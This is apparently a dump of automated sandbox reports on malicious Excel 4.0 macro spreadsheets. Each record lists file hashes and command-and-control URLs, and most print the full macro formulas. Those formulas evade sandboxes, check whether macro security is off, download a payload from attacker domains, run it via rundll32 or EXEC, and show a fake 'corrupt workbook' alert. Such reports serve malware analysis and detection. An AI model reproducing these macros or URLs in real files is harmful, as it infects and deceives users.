{"version":"0.2","sample":{"sample":"","kind":"file","target":"2ce3c4aa1f50e5ee115e81fff773a19b1953e83dc5461d99b376cfab5d41ca1f"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2ce3c4aa1f50e5ee115e81fff773a19b1953e83dc5461d99b376cfab5d41ca1f","filesize":206336,"md5":"2880fea6c0a9d3c2b99e0d9ef90a32c2","sha1":"ebd559e4962d3b0bd9ff9b2fc57055c9c366bc0e","sha256":"2ce3c4aa1f50e5ee115e81fff773a19b1953e83dc5461d99b376cfab5d41ca1f","sha512":"b569264f7d79bac91d8e42582465bf5ae6f5d403e16be43e0c821a4828fc55c078cdd8bca5f1a640f1896b6ce3ac6f4a94190704cc8639766168ffc2020e98ba","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2ce3c4aa1f50e5ee115e81fff773a19b1953e83dc5461d99b376cfab5d41ca1f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"M8CFOrHfEl\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2ceb049ce74c5c805c0c91c5d15942cba040f78adf251407c64f4dc6715a4ee4"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2ceb049ce74c5c805c0c91c5d15942cba040f78adf251407c64f4dc6715a4ee4","filesize":160768,"md5":"d094ce45e3f411af2ff5532ee4ea858e","sha1":"84dc5c3070f4e41a971cdf99b79b771e0b889f9f","sha256":"2ceb049ce74c5c805c0c91c5d15942cba040f78adf251407c64f4dc6715a4ee4","sha512":"88bdfedc3db4ef6acd9eaa1913172cc356be4da49382507a68f05cd946336db01b56f706c68ef4206773ce1cf63575a8ea3c42efdc8e0d3ebacaeeb013360648","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2ceb049ce74c5c805c0c91c5d15942cba040f78adf251407c64f4dc6715a4ee4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Mb2JI1RWcJ\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2cee62769215a80fe11717b9dd947b692aa8ec3da867309d032d1e589216329e"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2cee62769215a80fe11717b9dd947b692aa8ec3da867309d032d1e589216329e","filesize":209920,"md5":"c46170cd9a70c7606f8ee6529c7528c8","sha1":"5c323b183e0cfdb0dda3c70689ba17f02f7f721e","sha256":"2cee62769215a80fe11717b9dd947b692aa8ec3da867309d032d1e589216329e","sha512":"e6d4aa65dc4a92c58b80d1080cef01bd3876ba874ebe7863fdf241b6ef35b500577f2ecbaa22706011e9fe996df3e52e38a846bf861c5a15954fb9e94907d879","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2cee62769215a80fe11717b9dd947b692aa8ec3da867309d032d1e589216329e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wekZexOAnS\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2cf5ab2418a189212375c21203041abd07f7a2b49c9d7642f6940ede9eb8cf17"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2cf5ab2418a189212375c21203041abd07f7a2b49c9d7642f6940ede9eb8cf17","filesize":113664,"md5":"0774e292d048aee94e80a6174b8219f3","sha1":"1ac2a42ce1e0b70d8fa87851f648cae6b978be47","sha256":"2cf5ab2418a189212375c21203041abd07f7a2b49c9d7642f6940ede9eb8cf17","sha512":"c0da535b862264e9216764fd9256ec60ab0cd3dfb15e35f8d7c0a996d09dc3f54a1b1fb3c814e4fd11d788ea30de91d80e647b0587311cebee2d09e3004e9a13","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2cf5ab2418a189212375c21203041abd07f7a2b49c9d7642f6940ede9eb8cf17.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","http://icietdemain.fr/contents/2020/02/idle/222222.png","http://careers.sorint.it/idle/33333.png","http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://icietdemain.fr/contents/2020/02/idle/222222.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://careers.sorint.it/idle/33333.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nEXEC(\"c:\\Users\\Public\\asd2asff32.exe\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"Bu4G5mP5eh\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2cff4d1cd9bd129a30924e129428b4fce0b38e8ab2ad359d36147b3bb924b8ab"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2cff4d1cd9bd129a30924e129428b4fce0b38e8ab2ad359d36147b3bb924b8ab","filesize":209920,"md5":"2d9f43a4ea2f2022039ec91028864f5a","sha1":"fe9b1c736dad08b83b52ff723b946eed77a923b5","sha256":"2cff4d1cd9bd129a30924e129428b4fce0b38e8ab2ad359d36147b3bb924b8ab","sha512":"c4d4ea45356ad4ae0eb11ac19b92ffabae41d7bda113d82b9bec40f140e4abc2a96d3572984110e766e4fd9154c2816ad4ae1ca7bfe9c72dcaba5c7eaf394a5b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2cff4d1cd9bd129a30924e129428b4fce0b38e8ab2ad359d36147b3bb924b8ab.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JQxygqUNfH\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2d02077f419ca25a66b5bd50de43885972bd4e23f900997ac7f14696614b4d02"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2d02077f419ca25a66b5bd50de43885972bd4e23f900997ac7f14696614b4d02","filesize":209920,"md5":"9adc2fcda714d27842b8ab93060f943d","sha1":"da8d873092ca9158387f3b29a7546c55bbd56793","sha256":"2d02077f419ca25a66b5bd50de43885972bd4e23f900997ac7f14696614b4d02","sha512":"4f9e49781d164b509a7faa156ae695f6563e71612ba1a5b5deb6cf8e399d66d5dd92ab0ce902ad3782990639551ea4f54494369108c449ac01c8612f5ced4cee","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2d02077f419ca25a66b5bd50de43885972bd4e23f900997ac7f14696614b4d02.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Pgh9RxCAlq\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2d0ff3f658331073ea3055fd6ec012bde101b1dd632864f29b6477abbfe433d0"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2d0ff3f658331073ea3055fd6ec012bde101b1dd632864f29b6477abbfe433d0","filesize":185344,"md5":"23562ccee37706cfbabe289d366aca9d","sha1":"d931473a32b3028c6b1f8a32faebae2ce400a47c","sha256":"2d0ff3f658331073ea3055fd6ec012bde101b1dd632864f29b6477abbfe433d0","sha512":"e3eeb236583d792379cdfd6d9f3b0a28435d74a26863b6e5d7dac99fa9d5f7fa4d6461629a5e5aae5d2b141410561dc3aeb7f3c79663760d429be5b3abd2f764","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2d0ff3f658331073ea3055fd6ec012bde101b1dd632864f29b6477abbfe433d0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2d14c9fcf22fbd93fca401026579176f511a7aa88bb9826e22ef75a37f89d45a"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2d14c9fcf22fbd93fca401026579176f511a7aa88bb9826e22ef75a37f89d45a","filesize":226304,"md5":"2f0cab2ff43cb497318e03723a36e0c3","sha1":"5ba14dbbf5ff9fba4eea8c5bc91a877c25e5829e","sha256":"2d14c9fcf22fbd93fca401026579176f511a7aa88bb9826e22ef75a37f89d45a","sha512":"d3c4f192a2acc456e11db88cd4ed63f87657b807ec018bd7c611bf325150499b0644549d6fc5d11f83ee20dd28f254b4a2b9782d18ac7eda2c5192a5bf06f55d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2d14c9fcf22fbd93fca401026579176f511a7aa88bb9826e22ef75a37f89d45a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CYZyK6S7Yt\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2d14e4bef1c55ad71867c64e24f976170b52e9a1eee658765546d0b21b09d452"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2d14e4bef1c55ad71867c64e24f976170b52e9a1eee658765546d0b21b09d452","filesize":112128,"md5":"52ff6c3129cd6466f0d087adec75285b","sha1":"2a0fd5554f9ca8194289252c8dbacf89d20c05e6","sha256":"2d14e4bef1c55ad71867c64e24f976170b52e9a1eee658765546d0b21b09d452","sha512":"0cd0261147dbb5c4d3f8ce445fff2d4dba5bac0f6c60ddb19aca42e279980395650630ad5b53eae1eb0c2d90f55975ae6c2a7cbfbfa4f866f6b0c9c083fd91dd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2d14e4bef1c55ad71867c64e24f976170b52e9a1eee658765546d0b21b09d452.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2d1d3e31216c41220be3620a6699106683f0680aa9de2cc0d19c087552988e24"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2d1d3e31216c41220be3620a6699106683f0680aa9de2cc0d19c087552988e24","filesize":141824,"md5":"8adabad67d42c3228e08128ff71ecb0c","sha1":"666c7889420a59ea8dfbec7c0c4efa13c9828226","sha256":"2d1d3e31216c41220be3620a6699106683f0680aa9de2cc0d19c087552988e24","sha512":"dc411e9e613d991a3871219c8c622a5711907d735c0986803ef3b772d63163262e1ca46f31836d370759e5f4072005f2432dee165597780af44ff08e550e150a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2d1d3e31216c41220be3620a6699106683f0680aa9de2cc0d19c087552988e24.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"z8jXAmQGn5\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2d53134fb61bfe673f63912be9a5622514c54738ccc5031357940be8aec42657"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2d53134fb61bfe673f63912be9a5622514c54738ccc5031357940be8aec42657","filesize":112128,"md5":"f169864c8426c4bf4f13455432aefd9b","sha1":"3d00ff8656642cf191fc7d4fb33be80c0ce10338","sha256":"2d53134fb61bfe673f63912be9a5622514c54738ccc5031357940be8aec42657","sha512":"1867ced0961f9012e185fd3a251b30aa67aca221d32a4ef9b5c32e6ef520875a078513a2545372408442c62d6578ef3cb89e6a35c1b2fbf43235f3f19083e4ec","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2d53134fb61bfe673f63912be9a5622514c54738ccc5031357940be8aec42657.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2d5964e614a7f52f082f3b480e2f0f889828a0b240f534fa42a9ae8ab229620d"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2d5964e614a7f52f082f3b480e2f0f889828a0b240f534fa42a9ae8ab229620d","filesize":112640,"md5":"54a820a6167601855feb5b7e0a254538","sha1":"acc913b7877e98efd84481fe8525fa7cabe3a8c8","sha256":"2d5964e614a7f52f082f3b480e2f0f889828a0b240f534fa42a9ae8ab229620d","sha512":"7100a689da07ae899aa21797db28bfbaa4e4d0f55c1f4013062d503d1e2db2b6607181b8ee4b4b9adefc61244ba85c0f4aebe0c9c92520a08d8cca87d255d349","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2d5964e614a7f52f082f3b480e2f0f889828a0b240f534fa42a9ae8ab229620d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2d611317e41a6c81b364f5369a0dbde3147843278595aabb24687d4f2145f034"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2d611317e41a6c81b364f5369a0dbde3147843278595aabb24687d4f2145f034","filesize":144384,"md5":"07c2209dacb48d6a0f525e8bd1275a57","sha1":"67a08e2646b1aeeb8dd2bcf2e1b4f736e492d22b","sha256":"2d611317e41a6c81b364f5369a0dbde3147843278595aabb24687d4f2145f034","sha512":"b27e5eb2536568ea377ae9ad00a4fec824be58f3ea5560afd308629fca1b72dc81da0f5c562560a35c7bf46a15a33838ee9af5d1b5325d231d547d9065bc8d8f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2d611317e41a6c81b364f5369a0dbde3147843278595aabb24687d4f2145f034.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"WP0UwJ5HWl\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2d738310c6c1734f47a918db0bfb447d8a640513c383445fef9515fa58882f36"},"analysis":{"reported":"2020-04-09T16:15:32Z","score":10},"files":[{"filename":"2d738310c6c1734f47a918db0bfb447d8a640513c383445fef9515fa58882f36","filesize":226304,"md5":"3e489443e7b9719007316436c939447e","sha1":"0382b11bb420af4756b75e38c93de174b6bba5e7","sha256":"2d738310c6c1734f47a918db0bfb447d8a640513c383445fef9515fa58882f36","sha512":"973243a3dcc090e3a3807133ac431fa78629f7be56a1d57c28f0ddf08dc43b1e851cbd9767d75478366629081d0ca254ea76f0ac229d4110bd9593d411f52d89","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2d738310c6c1734f47a918db0bfb447d8a640513c383445fef9515fa58882f36.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TCcMkn4et7\",TRUE)\nGOTO(R$0C$17)"}}}]}
